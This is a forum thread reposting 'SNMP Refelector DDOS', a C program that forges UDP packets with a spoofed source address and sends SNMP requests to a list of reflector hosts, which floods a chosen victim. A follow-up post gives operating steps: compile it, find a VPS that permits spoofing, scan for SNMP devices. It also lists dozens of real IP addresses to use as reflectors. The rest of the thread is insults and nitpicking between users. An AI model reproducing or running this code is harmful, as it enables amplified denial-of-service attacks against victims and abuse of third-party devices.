SNMP Refelector DDOS | Cred Hex00010
  • All credit to Hex00010

    from Team P0ision

    http://r00tsecurity.org/db/exploits/288


    /*
    Exploit Title: SNMP Refelector DDOS
    Date: 9:2:11
    Author: Hex00010
    Tested on: Comcast Modems
    Contact: uat666@hotmail.com
    */



    #include <stdio.h>
    #include <netinet/ip.h>
    #include <sys/socket.h>
    #include <arpa/inet.h>
    #include <netinet/udp.h>
    #include <string.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <sys/types.h>
    #include <asm/types.h>

    /*
    The Government is a Corrupted Organization
    We are here to show the world the truth about them
    You dont like it - go fuck your self
    Anarchy For Life Bitch
    ===============================================================================
    THIS CODE IS MEANT TO STAY PRIVATE - DO NOT SHARE WITH ANYONE - It Is Now Public you Can repost this BUT give Credits
    ===============================================================================
    by Hex00010 - TeaMp0ison - 2011


    */

    /* Bytes placed after the UDP header of every packet: a hand-encoded
       SNMP request. The six bytes 70 75 62 6c 69 63 are the ASCII
       community string "public". The C string's trailing NUL is excluded
       everywhere via sizeof(payload)-1, giving 37 bytes on the wire. */
    char payload[] = \"\x30\x23\x02\x01\x01\x04\x06\x70\x75\x62\x6c\x69\x63\xa5\x16\x02\x02\x4e\x47\"
    \"\x02\x01\x00\x02\x02\x08\xca\x30\x09\x30\x07\x06\x03\x2b\x06\x01\x05\x00\";

    /* File-scope scratch headers, rewritten from scratch by every
       send_udp() call; not safe to share between threads. */
    struct iphdr ip_head;
    struct udphdr udp_head;
    struct sockaddr_in target;      /* sockaddr handed to sendto(); filled in send_udp() */

    struct udp_pseudo /*the udp pseudo header*/
    {
    unsigned int src_addr;          /* copied from ip_head.saddr, already network order */
    unsigned int dst_addr;          /* copied from ip_head.daddr */
    unsigned char dummy;            /* always 0 */
    unsigned char proto;            /* IPPROTO_UDP, copied from ip_head.protocol */
    unsigned short length;          /* UDP header + data length, network order */
    } pseudohead;
    /* NOTE(review): not declared packed; the 4+4+1+1+2 layout has no padding
       on the usual ABIs, but that is what the checksum below depends on. */

    struct help_checksum /*struct for checksum calculation*/
    {
    struct udp_pseudo pshd;         /* pseudo header precedes the real UDP header */
    struct udphdr udphd;            /* copied with check == 0 */
    } udp_chk_construct;

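    /*
     * One's-complement Internet checksum (RFC 1071) over len bytes at addr.
     *
     * addr: start of the region, read as 16-bit words in host byte order;
     *       it must therefore be suitably aligned for unsigned short.
     * len:  length in bytes. An odd trailing byte is folded in as if it were
     *       followed by a zero byte. len <= 0 yields 0xFFFF.
     * Returns the 16-bit one's complement of the folded sum, ready to be
     * stored in an IP or UDP checksum field.
     *
     * Review changes vs. the original: the accumulator is an unsigned 32-bit
     * value (a signed int overflows - undefined behaviour - once roughly
     * 64 KiB of 0xFFFF words have been summed), the deprecated `register`
     * storage class is dropped, and the non-standard u_char type is replaced
     * by unsigned char. The returned values are byte-identical.
     */
    unsigned short in_cksum(unsigned short *addr,int len)
    {
        const unsigned short *w = addr;
        uint32_t sum = 0;
        int nleft = len;

        /* Sum whole 16-bit words; carries accumulate in the upper half. */
        while (nleft > 1) {
            sum += *w++;
            nleft -= 2;
        }

        /* Odd trailing byte: place it in the first byte of a zeroed word so
           that its position matches a zero-padded final word. */
        if (nleft == 1) {
            unsigned short last = 0;
            *(unsigned char *)&last = *(const unsigned char *)w;
            sum += last;
        }

        /* Fold the 32-bit sum into 16 bits twice to absorb every carry. */
        sum = (sum >> 16) + (sum & 0xffff);
        sum += (sum >> 16);
        return (unsigned short)~sum;
    }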

    /*
     * Build one raw IPv4/UDP datagram in the file-scope header structs and
     * hand it to sendto() on sfd.
     *
     * sfd:         raw socket opened in main() with IPPROTO_RAW; the IP
     *              header assembled here goes out as-is, so src becomes the
     *              on-wire source address (the sender's address is spoofed)
     * src, dst:    IPv4 addresses in network byte order (from inet_addr())
     * src_p, dst_p: UDP ports in host order, converted with htons() below
     * buffer:      bytes copied after the UDP header
     * len:         never read; every size in this function uses
     *              sizeof(payload)-1 instead, so buffer is assumed to hold at
     *              least that many bytes
     *
     * Both malloc() results are used without a NULL check and the sendto()
     * return value is discarded. The local i is unused.
     */
    void send_udp(int sfd,unsigned int src,unsigned short src_p,
    unsigned int dst,unsigned short dst_p,char *buffer,int len)
    {
    char *packet;
    int i;                          /* unused */

    /*Prepare IP header*/
    ip_head.ihl = 5; /*headerlength with no options*/
    ip_head.version = 4;
    ip_head.tos = 22;               /* fixed, unusual TOS value; no reason given */
    /* total length is derived from the global payload, not from len */
    ip_head.tot_len = htons(sizeof(struct iphdr)+sizeof(struct udphdr)+sizeof(payload)-1);
    /* srand() is never called in this file, so this id sequence is the same
       on every run (30000..30099) */
    ip_head.id = htons(30000 + (rand()%100));
    ip_head.frag_off = 0;
    ip_head.ttl = 64;
    ip_head.protocol = IPPROTO_UDP;
    ip_head.check = 0; /*Must be zero for checksum calculation*/
    ip_head.saddr = src;
    ip_head.daddr = dst;

    /* NOTE(review): Linux raw sockets are commonly said to recompute this
       field themselves; the value computed here may be overwritten - confirm */
    ip_head.check = in_cksum((unsigned short *)&ip_head,sizeof(struct iphdr));

    /*Prepare UDP header*/
    udp_head.source = htons(src_p);
    udp_head.dest = htons(dst_p);
    udp_head.len = htons(sizeof(struct udphdr)+sizeof(payload)-1);
    udp_head.check = 0;             /* zero while the UDP checksum is computed */

    /*Assemble structure for checksum calculation and calculate checksum*/
    pseudohead.src_addr=ip_head.saddr;
    pseudohead.dst_addr=ip_head.daddr;
    pseudohead.dummy=0;
    pseudohead.proto=ip_head.protocol;
    pseudohead.length=htons(sizeof(struct udphdr)+sizeof(payload)-1);
    udp_chk_construct.pshd=pseudohead;
    udp_chk_construct.udphd=udp_head;
    /* temporary buffer: pseudo header + UDP header + data, checksummed as one
       region, then discarded */
    packet=malloc(sizeof(struct help_checksum)+sizeof(payload)-1);
    memcpy(packet,&udp_chk_construct,sizeof(struct help_checksum)); /*pre-assemble packet for*/
    memcpy(packet+sizeof(struct help_checksum),buffer,sizeof(payload)-1); /*checksum calculation*/
    udp_head.check=in_cksum((unsigned short *)packet,sizeof(struct help_checksum)+sizeof(payload)-1);
    free(packet);

    /*Assemble packet*/
    /* second buffer holds the bytes actually transmitted: IP + UDP + data */
    packet=malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+sizeof(payload)-1);
    memcpy(packet,(char *)&ip_head,sizeof(struct iphdr));
    memcpy(packet+sizeof(struct iphdr),(char *)&udp_head,sizeof(struct udphdr));
    memcpy(packet+sizeof(struct iphdr)+sizeof(struct udphdr),buffer,sizeof(payload)-1);

    /*Send packet*/
    target.sin_family = AF_INET;
    target.sin_addr.s_addr= ip_head.daddr;
    /* the sockaddr carries the UDP *source* port; presumably irrelevant for a
       raw socket, since the real ports are inside the packet - confirm */
    target.sin_port = udp_head.source;
    sendto(sfd,packet,sizeof(struct iphdr)+sizeof(struct udphdr)+sizeof(payload)-1,0,
    (struct sockaddr *)&target,sizeof(struct sockaddr_in));
    free(packet);
    }

    /*
     * Entry point. argv[1] is the address written into the IP source field
     * of every packet; argv[2] names a file with one IPv4 address per line.
     * Each listed address is sent the payload on UDP port 161 from port 161,
     * and the file is re-read in an endless for(;;) loop, so the final
     * return 0 is unreachable and the program only stops when killed.
     *
     * Observations for a reader of this listing (none of these are fixed
     * here, the code is left as posted):
     *  - data is allocated and filled but never used or freed;
     *  - the usage printf() has no conversion yet is passed argv[0];
     *  - fopen() is deliberately unchecked; a missing file leaves fp NULL,
     *    after which feof(fp) is undefined behaviour;
     *  - fscanf("%s") has no field width, so any token longer than 15 bytes
     *    overruns the 16-byte aline buffer (heap overflow);
     *  - the while(!feof) idiom runs the body once more after the last line,
     *    with aline still zeroed from the memset, so inet_addr("") is passed
     *    to send_udp();
     *  - srcip is recomputed from argv[1] on every iteration.
     */
    int main(int argc, char *argv[]) {
    int i=0;                        /* reused below as the raw socket descriptor */
    unsigned int srcip, dstip;
    char *data;
    data=malloc(sizeof(payload)+sizeof(payload)-1);    /* unused copy of payload */
    memcpy(data, payload, sizeof(payload)-1);
    char* aline = calloc(16, sizeof(char) );           /* one address per read, 15 chars + NUL */

    if(argc < 3) {
    printf(\"By Hex00010 - TeaMp0ison - 2011\n\", argv[0]);   /* argv[0] is never printed */
    exit(1);
    }

    /* IPPROTO_RAW: the caller supplies the full IP header (requires root) */
    if((i=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) /*open sending socket*/
    {
    perror(\"socket\");
    exit(1);
    }

    for(;;) {
    FILE* fp = fopen( argv[2], \"r\" );
    /* skip fopen checking because its not really necessary for what we're doing*/

    while ( !feof(fp) )
    {
    fscanf( fp, \"%s\n\", aline );   /* unbounded read into a 16-byte buffer */
    srcip = inet_addr(argv[1]);
    dstip = inet_addr(aline);
    /* buffer = payload and len = 37; send_udp() ignores len anyway */
    send_udp(i,srcip,161,dstip,161,payload,sizeof(payload)-1);
    memset( aline, 0, 16 );
    }
    fclose(fp);
    }
    return 0;                       /* unreachable */
    }

    /*
    Greetz: Trick aka SayWhat? , Luit , Ins^ane, joepie91, Sabu , Anonymous
    */
  • Sh3llc0d3
    Posts: 1,910
    That is some sexual code! Love seeing C/C++ linux sockets - a lot nicer to read than winsock2
  • m0rph
    Posts: 332
    I like how time to live is set to 64, but you would probably only use this on a modem within your subnet...requiring maybe 2 to 3 hops max...lol

    So basically...the exploit constructs a UDP packet for a TCP/SNMP port...(Begin sarcasm...now!) I can't be certain, but last I checked UDP/SNMP port was 162...not 161 (TCP).

    Very strange usage too, it seems to me it goes like this:

    ./exploit [source IP] [File of destination IP's]

    Anyone else willing to verify that?

    Basically...yeah, it's cool and all, but this exploit is pretty useless unless your ISP is comcast, and you wanna fuck with people in your subnet.
    while( !(succeed = try() ) );
  • Actually I only tested on Comcast but i have sent packets and ran a TCPDUMP and this effects every opearting system

    DO NOT RUN THIS ON YOUR LOCAL PC UNLESSS YOUR SYSTEM IS POWERFUL

    Other wise you have to upload it on a VPS the hosting provider must allow Packet spoofing otherwise this 0day will not work

    All you have to do is scan for SNMP ip's add them to a file such as file.txt and execute code like this




    gcc -o Hex00010 Hex00010.c
    ./Hex00010 <target ip> <file.list>


    Below is a sample of ip's




    [code]
    99.4.139.230
    99.4.140.54
    99.4.140.62
    99.4.157.14
    99.5.80.166
    99.5.80.230
    99.4.139.194
    99.4.157.142
    99.5.84.110
    99.4.158.142
    99.4.83.246
    99.4.83.46
    99.4.159.182
    99.4.73.230
    99.4.158.214
    99.3.86.22
    99.4.90.86
    99.4.89.70
    99.4.159.134
    99.4.90.62
    99.4.92.166
    99.4.90.94
    99.6.176.94
    99.4.95.246
    99.5.116.94
    99.4.95.214
    99.6.176.118
    99.5.100.14
    99.5.100.182
    99.5.228.6
    99.4.95.158
    99.6.177.54
    99.4.137.54
    99.6.177.126
    99.4.139.126
    99.5.100.214
    99.5.102.14
    99.6.182.118
    99.6.180.22
    99.6.177.26
    99.6.182.174
    99.5.111.38
    99.5.80.134
    99.6.182.158
    99.6.182.150
    99.6.182.198
    99.6.182.182
    99.5.100.166
    99.5.85.134
    99.6.182.86
    99.5.85.254
    99.5.85.141
    99.9.250.142
    99.5.83.222
    99.9.250.182
    99.9.250.174
    99.9.251.30
    99.8.249.14
    99.5.98.190
    99.4.92.158
    99.5.99.22
    99.4.93.230
    99.9.129.202
    98.133.197.48
    99.6.184.142
    98.133.197.61
    99.7.168.117
    99.8.184.151
    99.8.255.13
    98.133.197.241
    99.0.76.54
    99.5.82.161
    99.6.177.182
    98.133.197.91
    99.2.224.38
    98.133.197.136
    98.133.197.168
    99.2.250.6
    98.133.197.101
    99.252.32.210
    98.132.117.4
    98.133.197.115
    74.52.103.130
    74.52.158.202
    74.52.196.66
    72.232.124.34
    [/code]




    Run a whois check on all those ip's and check for your self its running SNMP

    Also while in a shell open up another shell and execute the following command

    [code]
    tcpdump -ni eth1 -w Packets.cap not port 22
    [/code]

    If you are running this locally on your pc execute this command only

    [code]
    tcpdump -ni eth1 -w Packets.cap
    [/code]


    If it gives you some error about eth1 type this command

    [code]
    ifconfig
    [/code]

    and get the name of your network name thing and replace it with eth1

    Attack a site for like 30 seconds stop the attack and open up the .cap file by execute the following command


    [code]
    tcpdump -r Packets.cap



    Hope this helps
  • m0rph
    Posts: 332
    said:


    1)Actually I only tested on Comcast but i have sent packets and ran a TCPDUMP and this effects every opearting system
    ...
    2)DO NOT RUN THIS ON YOUR LOCAL PC UNLESSS YOUR SYSTEM IS POWERFUL
    ...
    3)Other wise you have to upload it on a VPS the hosting provider must allow Packet spoofing otherwise this 0day will not work
    ...
    4)All you have to do is scan for SNMP ip's
    ...
    5)Run a whois check on all those ip's
    ...
    6)If it gives you some error about eth1 type this command
    ...
    7)and get the name of your network name thing and replace it with eth1


    1) If you only tested on Comcast modems, how do you know it works on others? Keep in mind, I'm using your own words against you.

    2) LOL!!!

    3) Of course...why didn't I think of a VPS that spoofz all yur packetz?

    4) Refer to number 2

    5) Why do that, when I could import that same list of ip's into...oh I dont know...NMap???? And scan all the IP's for UDP/SNMP ports??? Also, refer to number 4.

    6) "some error about eth1" ......wow.

    7) "network name thing" ... I can't be certain, but I would think someone who has the knowledge to program in C++, AND fully construct a packet complete with a UDP header, and shellcode, would understand what a "network name thing" is actually called **cough** interface **cough**.

    Give it up dude...I didn't even have to read through your whole post to know who you really are. Who else has claimed to be the author of a tool that they really weren't on this forum? Who else would create an account to make one post, only to disappear and start the cycle over again?

    What's sad is, you're almost a man now, but you still act like you're 12. When's graduation darkgt4? This year? Next year? Surely it must be coming soon, yeah?

    What truly made me laugh though, was that you used tcpdump for a tool that attacks with udp. For shame...
    while( !(succeed = try() ) );
  • WoW your a dick

    1. re-read my same statement that answers your questions
    2. Test it out and see if u lol
    3. Not All hosting corporations allow spoofed packets only certain ones allow that so...........
    4. You would be surprised at how many people wouldnt know that or what to do
    5. Run the whois for verification on the IP' Some people do other diff ways not everyone uses ummm less say Nmap?
    6/7. I can pretty much call it whatever i want however due to the fact of my unavailability to think clearly due to THC that is my excuess


    You know you come off like a dick trying to act like you can own someone

    You know its people like you that fuck the scene up due to the fact of there Social Emotionality on how good they think they are


    Anything else?

    FYI dipshit

    Run the TCPDUMP while u attack the site and reading the dam .cap file your intelligence is pathetic

    Your intelligence is what made me laugh
  • i have never heard of SNMP in relation to port 163. also, doesn't SNMP use TCP when doing a BULK GET in version 3?
  • m0rph
    Posts: 332
    said:


    i have never heard of SNMP in relation to port 163. also, doesn't SNMP use TCP when doing a BULK GET in version 3?


    Agreed, McKittrick. This clown registered almost immediately after this thread was made. Just another skid trying to show off his internet dick. He didn't even get the usage right:
    said:


    gcc -o Hex00010 Hex00010.c
    ./Hex00010 <target ip> <file.list>


    Why would you need to select 1 target IP from the first argument, and then an entire list of target IP's in the second? That's stupid.

    Besides the code below...:

    for(;;) {
    FILE* fp = fopen( argv[2], \"r\" );
    while ( !feof(fp) )
    {
    fscanf( fp, \"%s\n\", aline );
    ...
    dstip = inet_addr(aline);
    ...

    ...clearly says that a pointer is set to read a file with a list of "dstip" (destination IP's) from the 2nd argument. The first argument:

    while ( !feof(fp) )
    {
    ...
    srcip = inet_addr(argv[1]);
    ...
    send_udp(i,srcip,161,dstip,161,payload,sizeof(payload)-1);
    ...
    }

    Is asking to set the source IP for the packet...hence my conclusion of the usage:
    ./exploit [source IP] [File of Destination IP's]

    This wannabe that joined just to post on this thread is a moron.
    Yes, I also agree with you on the mistake that a UDP exploit is targeting a TCP port. It could have been tampered with to stop skids like this fake Hex01000 from using it.
    while( !(succeed = try() ) );
  • @McKittrick Here you go

    http://technet.microsoft.com/en-us/libr ... 59643.aspx

    that should answer your question

    @m0rph once again your a dipshit

    Let me go reallly simple for u


    Param 1 = Target
    Param 2 = list.txt

    i want to attack google.com

    ./rawr google ip lists.txt


    lets say i scanned 100 ip's

    i place those 100 ip's in lists.txt

    the lists.txt now attacks google ip



    Once Again mate learn 2 quit


    Ooo btw i found it funny how i replied what LONG AGO and you NEVER EVER EVER replied ONCE

    but now that some guy just so happens to reply your the first fucker to post the second message
  • m0rph
    Posts: 332
    said:


    Ooo btw i found it funny how i replied what LONG AGO and you NEVER EVER EVER replied ONCE


    Because I have self control and I really don't care what some random troll has to say over the internet.
    while( !(succeed = try() ) );
  • x3n0n
    Posts: 110
    http://profile.ak.fbcdn.net/hprofile-ak-snc4/41784_2253543784_4474_n.jpg